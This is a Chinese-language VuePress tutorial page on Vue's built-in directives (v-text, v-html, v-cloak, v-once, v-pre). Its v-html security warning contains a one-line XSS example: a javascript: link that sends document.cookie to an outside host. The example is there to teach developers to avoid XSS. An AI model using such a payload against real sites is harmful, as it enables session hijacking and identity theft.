<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>vue其他内置指令 | MANTU_DOCS</title>
    <meta name="generator" content="VuePress 1.8.2">
    <link rel="icon" href="/logo.jpg">
    <meta name="description" content="MANTU_TECH_DOCS">
    
    <link rel="preload" href="/assets/css/0.styles.65e3a471.css" as="style"><link rel="preload" href="/assets/js/app.166e2bf3.js" as="script"><link rel="preload" href="/assets/js/2.1ccbfc32.js" as="script"><link rel="preload" href="/assets/js/28.fdce4599.js" as="script"><link rel="preload" href="/assets/js/6.c337f479.js" as="script"><link rel="prefetch" href="/assets/js/10.cc1e96ea.js"><link rel="prefetch" href="/assets/js/11.6d504d06.js"><link rel="prefetch" href="/assets/js/12.b8aa2bcb.js"><link rel="prefetch" href="/assets/js/13.79560b1d.js"><link rel="prefetch" href="/assets/js/14.e19c697e.js"><link rel="prefetch" href="/assets/js/15.5346e8a2.js"><link rel="prefetch" href="/assets/js/16.e6fde2cd.js"><link rel="prefetch" href="/assets/js/17.4c262ed8.js"><link rel="prefetch" href="/assets/js/18.511d4f87.js"><link rel="prefetch" href="/assets/js/19.3b4aa9c4.js"><link rel="prefetch" href="/assets/js/20.92dd2077.js"><link rel="prefetch" href="/assets/js/21.3ea83f97.js"><link rel="prefetch" href="/assets/js/22.1c958d34.js"><link rel="prefetch" href="/assets/js/23.44961888.js"><link rel="prefetch" href="/assets/js/24.734470cc.js"><link rel="prefetch" href="/assets/js/25.220a8a1f.js"><link rel="prefetch" href="/assets/js/26.46ffd6e8.js"><link rel="prefetch" href="/assets/js/27.90edbe2d.js"><link rel="prefetch" href="/assets/js/29.cbfce040.js"><link rel="prefetch" href="/assets/js/3.8db0f2c7.js"><link rel="prefetch" href="/assets/js/30.e658b805.js"><link rel="prefetch" href="/assets/js/31.963534ff.js"><link rel="prefetch" href="/assets/js/32.8fdd97fe.js"><link rel="prefetch" href="/assets/js/33.3020d54b.js"><link rel="prefetch" href="/assets/js/34.1c75c6bf.js"><link rel="prefetch" href="/assets/js/35.84d013fe.js"><link rel="prefetch" href="/assets/js/36.31890f88.js"><link rel="prefetch" href="/assets/js/37.fa98b9b5.js"><link rel="prefetch" href="/assets/js/38.83638902.js"><link rel="prefetch" href="/assets/js/39.f2c8a700.js"><link rel="prefetch" href="/assets/js/4.53e71ea3.js"><link rel="prefetch" href="/assets/js/40.8e08bd27.js"><link rel="prefetch" href="/assets/js/41.14482dfc.js"><link rel="prefetch" href="/assets/js/42.a0ce39e0.js"><link rel="prefetch" href="/assets/js/43.478760c3.js"><link rel="prefetch" href="/assets/js/44.5b7e9084.js"><link rel="prefetch" href="/assets/js/45.9d955952.js"><link rel="prefetch" href="/assets/js/46.a760a4ba.js"><link rel="prefetch" href="/assets/js/47.2ce9d265.js"><link rel="prefetch" href="/assets/js/48.a9a0cd7c.js"><link rel="prefetch" href="/assets/js/49.5043a0bf.js"><link rel="prefetch" href="/assets/js/5.8ceba14d.js"><link rel="prefetch" href="/assets/js/50.37c061f9.js"><link rel="prefetch" href="/assets/js/51.40be1d33.js"><link rel="prefetch" href="/assets/js/7.5bfed052.js"><link rel="prefetch" href="/assets/js/8.8531b46a.js"><link rel="prefetch" href="/assets/js/9.5d07fc22.js">
    <link rel="stylesheet" href="/assets/css/0.styles.65e3a471.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><img src="/logo.jpg" alt="MANTU_DOCS" class="logo"> <span class="site-name can-hide">MANTU_DOCS</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="前端技术文档" class="dropdown-title"><span class="title">前端技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="前端技术文档" class="mobile-dropdown-title"><span class="title">前端技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/vuedocs/" class="nav-link router-link-active">
  vue_docs
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="后端技术文档" class="dropdown-title"><span class="title">后端技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="后端技术文档" class="mobile-dropdown-title"><span class="title">后端技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/springboot_docs/" class="nav-link">
  springboot
</a></li><li class="dropdown-item"><!----> <a href="/springcloudalibaba/" class="nav-link">
  springcloudalibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="运维技术文档" class="dropdown-title"><span class="title">运维技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="运维技术文档" class="mobile-dropdown-title"><span class="title">运维技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/serverdocs/" class="nav-link">
  paas
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="Mantu主页" class="dropdown-title"><span class="title">Mantu主页</span> <span class="arrow down"></span></button> <button type="button" aria-label="Mantu主页" class="mobile-dropdown-title"><span class="title">Mantu主页</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Mantu主页
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/vuedocs/basevue/docs/.html#" class="nav-link">
  Mantu主页
</a></li></ul></li></ul></div></div><div class="nav-item"><a href="https://github.com/HHHHHMMMM/effective-mantu-ms" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="前端技术文档" class="dropdown-title"><span class="title">前端技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="前端技术文档" class="mobile-dropdown-title"><span class="title">前端技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/vuedocs/" class="nav-link router-link-active">
  vue_docs
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="后端技术文档" class="dropdown-title"><span class="title">后端技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="后端技术文档" class="mobile-dropdown-title"><span class="title">后端技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/springboot_docs/" class="nav-link">
  springboot
</a></li><li class="dropdown-item"><!----> <a href="/springcloudalibaba/" class="nav-link">
  springcloudalibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="运维技术文档" class="dropdown-title"><span class="title">运维技术文档</span> <span class="arrow down"></span></button> <button type="button" aria-label="运维技术文档" class="mobile-dropdown-title"><span class="title">运维技术文档</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/serverdocs/" class="nav-link">
  paas
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="Mantu主页" class="dropdown-title"><span class="title">Mantu主页</span> <span class="arrow down"></span></button> <button type="button" aria-label="Mantu主页" class="mobile-dropdown-title"><span class="title">Mantu主页</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Mantu主页
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/vuedocs/basevue/docs/.html#" class="nav-link">
  Mantu主页
</a></li></ul></li></ul></div></div><div class="nav-item"><a href="https://github.com/HHHHHMMMM/effective-mantu-ms" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Vue_Base</span> <span class="arrow down"></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/vuedocs/basevue/docs/初识vue.html" class="sidebar-link">vue基础</a></li><li><a href="/vuedocs/basevue/docs/Vue模板语法.html" class="sidebar-link">Vue模板语法</a></li><li><a href="/vuedocs/basevue/docs/vue中的属性和方法.html" class="sidebar-link">vue中的属性和方法</a></li><li><a href="/vuedocs/basevue/docs/监视属性.html" class="sidebar-link">监视属性</a></li><li><a href="/vuedocs/basevue/docs/计算属性.html" class="sidebar-link">计算属性</a></li><li><a href="/vuedocs/basevue/docs/计算属性和监听属性的对比.html" class="sidebar-link">计算属性和监听属性的对比</a></li><li><a href="/vuedocs/basevue/docs/事件处理.html" class="sidebar-link">事件处理</a></li><li><a href="/vuedocs/basevue/docs/条件渲染.html" class="sidebar-link">条件渲染</a></li><li><a href="/vuedocs/basevue/docs/列表渲染.html" class="sidebar-link">列表渲染</a></li><li><a href="/vuedocs/basevue/docs/数据代理.html" class="sidebar-link">数据代理</a></li><li><a href="/vuedocs/basevue/docs/vue检测数据改变的原理.html" class="sidebar-link">vue检测数据改变的原理</a></li><li><a href="/vuedocs/basevue/docs/收集表单数据.html" class="sidebar-link">收集表单数据</a></li><li><a href="/vuedocs/basevue/docs/vue其他内置指令.html" class="active sidebar-link">vue其他内置指令</a><ul class="sidebar-sub-headers"></ul></li><li><a href="/vuedocs/basevue/docs/vue中自定义指令.html" class="sidebar-link">vue中自定义指令</a></li><li><a href="/vuedocs/basevue/docs/vue的生命周期.html" class="sidebar-link">vue的生命周期</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Vue_Advance</span> <span class="arrow right"></span></p> <!----></section></li></ul> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="vue其他内置指令"><a href="#vue其他内置指令" class="header-anchor">#</a> vue其他内置指令</h1> <p>vue中存在两种类型指令，一个叫“内置指令”,本质上就是vue官方提供给我们的指令，例如<code>v=bind</code>,<code>v-model</code>等等。还有一种指令叫做“自定义指令”，这种指令是用户自己自定义出来的，vue官方没有提供。这一节，一些常见的内置指令梳理一下。</p> <p>基于前面文档，我们已经知道了：</p> <ol><li><p><code>v-bind :</code> 单向绑定解析表达式, 可简写为 <code>:xxx</code></p></li> <li><p><code>v-model :</code>双向数据绑定</p></li> <li><p><code>v-for:</code>遍历数组/对象/字符串</p></li> <li><p><code>v-on:</code>绑定事件监听, 可简写为<code>@</code></p></li> <li><p><code>v-if:</code>条件渲染（动态控制节点是否存存在）</p></li> <li><p><code>v-else:</code>条件渲染（动态控制节点是否存存在）</p></li> <li><p><code>v-show:</code> 条件渲染 (动态控制节点是否展示)</p></li></ol> <h3 id="v-text指令"><a href="#v-text指令" class="header-anchor">#</a> v-text指令</h3> <p>作用：向其所在的节点中渲染文本内容。</p> <p>与插值语法的区别：</p> <ol><li>v-text会替换掉节点中的内容，而差值语法则不会</li> <li>v-text中会把其对应变量的值完全当成一个字符串，即使里面有标签属性，也不会解析。</li></ol> <p>例如：</p> <div class="language-html line-numbers-mode"><div class="highlight-lines"><br><br><br><div class="highlighted"> </div><div class="highlighted"> </div><br><br><br><br><br><br><br><br><br><br><br><br></div><pre class="language-html"><code>			...
		<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>root<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span><span class="token punctuation">&gt;</span></span>你好，{{name}}<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
			<span class="token comment">&lt;!-- 以下div会完全被替换成 “spdb”，“你好”不会被展示 --&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">v-text</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>name<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>你好，<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
			<span class="token comment">&lt;!-- 以下div会完全被替换成 “&lt;h3&gt;你好啊！&lt;/h3&gt;”，&lt;h3&gt;标签不会被解析 --&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">v-text</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>str<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
		 <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
			...
			new Vue({
			el:'#root',
			data:{
				name:'spdb',
				str:'<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h3</span><span class="token punctuation">&gt;</span></span>你好啊！<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h3</span><span class="token punctuation">&gt;</span></span>'
			}
		})
</code></pre><div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><h3 id="v-html指令"><a href="#v-html指令" class="header-anchor">#</a> v-html指令</h3> <p>作用：向指定节点中渲染包含html结构的内容。</p> <p>与插值语法的区别：</p> <ol><li><code>v-html</code>会替换掉节点中所有的内容，则不会。</li> <li><code>v-html</code>可以识别html结构。</li></ol> <p>与<code>v-text</code>的区别:<code>v-html</code>会解析变量中包含的html结构内容。</p> <p>例如：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>root<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span><span class="token punctuation">&gt;</span></span>你好，{{name}}<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
			<span class="token comment">&lt;!--str:'&lt;h3&gt;你好啊！&lt;/h3&gt;'--&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">v-html</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>str<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
		<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>此时h3标签会被解析。</p> <div class="custom-block danger"><p class="custom-block-title">WARNING</p> <p>请注意：<code>v-html</code>指令有<strong>安全性</strong>问题！！！！！！！</p> <p>一般少用，在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击。一定要在可信的内容上使用v-html，永不要用在用户提交的内容上！！</p> <p>Q：为什么是危险的？</p> <p>A:  这个跟cookie本身的安全性有关。cookie是一个网站用来用户验证的重要手段，当有人窃取到你的cookie时，就可以伪造你的身份，以你身份来登陆相关网站而无需验证。</p> <p>Q:如何伪造cookie？</p> <p>A:恰恰就是因为v-html会解析变量中所有的标签。在js中，是可以通过document.cookie来得到当前网站的所有cookie数据的，想想以下，如果我是黑客，当你点击了如下代码生成的内容时：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code>&lt;a href=javascript:location.href=&quot;http://www.mantu.com?&quot;+document.cookie&gt;兄弟我找到你想要的资源了，快来！<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>此时就会把当前网站你所有的，可以不通过http请求拿到的cookie通通拿到，并上传到mantu.com，是不是觉得很可怕？</p></div> <p>附：关于cookie的详细解释，可观看如下视频：</p> <p><iframe width="100%" frameborder="no" scrolling="no" seamless="seamless" allowfullscreen="allowfullscreen" src="https://upos-sz-mirrorhw.bilivideo.com/upgcxcode/68/32/235543268/235543268-1-208.mp4?e=ig8euxZM2rNcNbRVhwdVhwdlhWdVhwdVhoNvNC8BqJIzNbfq9rVEuxTEnE8L5F6VnEsSTx0vkX8fqJeYTj_lta53NCM=&amp;uipk=5&amp;nbs=1&amp;deadline=1636885770&amp;gen=playurlv2&amp;os=hwbv&amp;oi=17808763&amp;trid=761a62f8e1e041928630da1ebf81c570T&amp;platform=html5&amp;upsig=4a8a3388e8e66662d09e2036613c436c&amp;uparams=e,uipk,nbs,deadline,gen,os,oi,trid,platform&amp;mid=0&amp;bvc=vod&amp;nettype=0&amp;bw=69507&amp;orderid=0,1&amp;logo=80000000" class="video-iframe"></iframe></p> <h3 id="v-cloak指令"><a href="#v-cloak指令" class="header-anchor">#</a> v-cloak指令</h3> <div class="language- extra-class"><pre><code>           1. 本质是一个特殊属性，Vue实例创建完毕并接管容器后，会删掉v-cloak属性。
           2. 使用css配合v-cloak可以解决网速慢时页面展示出差值语法慢的问题。
</code></pre></div><h3 id="v-once指令"><a href="#v-once指令" class="header-anchor">#</a> v-once指令</h3> <ol><li><p>v-once所在节点在初次动态渲染后，就视为静态内容了</p></li> <li><p>以后数据的改变不会引起v-once所在结构的更新，可以用于优化性能。</p> <p>例如：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code>	   <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>root<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
           <span class="token comment">&lt;!--本行代码在第一次动态渲染之后不会再次渲染，会被视为静态内容。故其值永远为n的初始值--&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span> <span class="token attr-name">v-once</span><span class="token punctuation">&gt;</span></span>初始化的n值是:{{n}}<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>
           <span class="token comment">&lt;!--本行代码可以后续正常渲染--&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span><span class="token punctuation">&gt;</span></span>当前的n值是:{{n}}<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>button</span> <span class="token attr-name">@click</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>n++<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>点我n+1<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>button</span><span class="token punctuation">&gt;</span></span>
		<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h3 id="v-pre指令"><a href="#v-pre指令" class="header-anchor">#</a> v-pre指令</h3></li> <li><p>跳过其所在节点的编译过程。</p></li> <li><p>可利用它跳过：没有使用指令语法、没有使用插值语法的节点，会加快编译。</p> <p>例如：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code>		<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>root<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
            <span class="token comment">&lt;!--本行代码没有使用vue中渲染的任何值，所以可以使用v-pre指令跳过该节点的编译--&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span> <span class="token attr-name">v-pre</span><span class="token punctuation">&gt;</span></span>Vue其实很简单<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>
            <span class="token comment">&lt;!--本行代码使用vue中渲染的值，所以不会使用v-pre,如果也使用了v-pre,那么该行也会被跳过，差值语法将显示为&quot;{{n}}&quot;，而不是n的值--&gt;</span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span> <span class="token punctuation">&gt;</span></span>当前的n值是:{{n}}<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>
			<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>button</span> <span class="token attr-name">@click</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>n++<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>点我n+1<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>button</span><span class="token punctuation">&gt;</span></span>
		<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div></li></ol> <p>​</p> <p>​</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">Last Updated:</span> <span class="time">11/14/2021, 3:40:13 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
      ←
      <a href="/vuedocs/basevue/docs/收集表单数据.html" class="prev">
        收集表单数据
      </a></span> <span class="next"><a href="/vuedocs/basevue/docs/vue中自定义指令.html">
        vue中自定义指令
      </a>
      →
    </span></p></div> </main></div><div class="global-ui"><!----></div></div>
    <script src="/assets/js/app.166e2bf3.js" defer></script><script src="/assets/js/2.1ccbfc32.js" defer></script><script src="/assets/js/28.fdce4599.js" defer></script><script src="/assets/js/6.c337f479.js" defer></script>
  </body>
</html>
